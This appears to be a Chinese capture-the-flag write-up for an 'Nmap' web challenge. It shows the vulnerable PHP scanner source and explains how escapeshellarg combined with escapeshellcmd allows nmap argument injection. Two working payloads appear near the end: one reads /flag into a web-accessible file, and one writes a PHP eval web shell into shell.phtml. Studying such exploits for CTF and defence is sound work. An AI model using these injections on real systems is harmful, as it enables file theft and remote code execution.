[朱雀组]Nmap

康康源码：

index.php

<?
require('settings.php');


set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}

	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);

	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}
else:
?>

settings.php：

<?
# Path where all files stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readble/writable for web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');

# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');

# Comment this line to disable web scans
define('WEB_SCANS', 'enable');

# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');

# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');

?>

主要语句：

$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);

带入之后相当于：

$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host

方法一：直接读flag写入文件

• -iL:从文件中加载目标

• -oN:将扫描后的文件信息以“Normal”的形式输出存储

 ' -iL /flag -oN flag.txt '

访问flag.txt

方法二：一句话木马绕过php过滤

'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '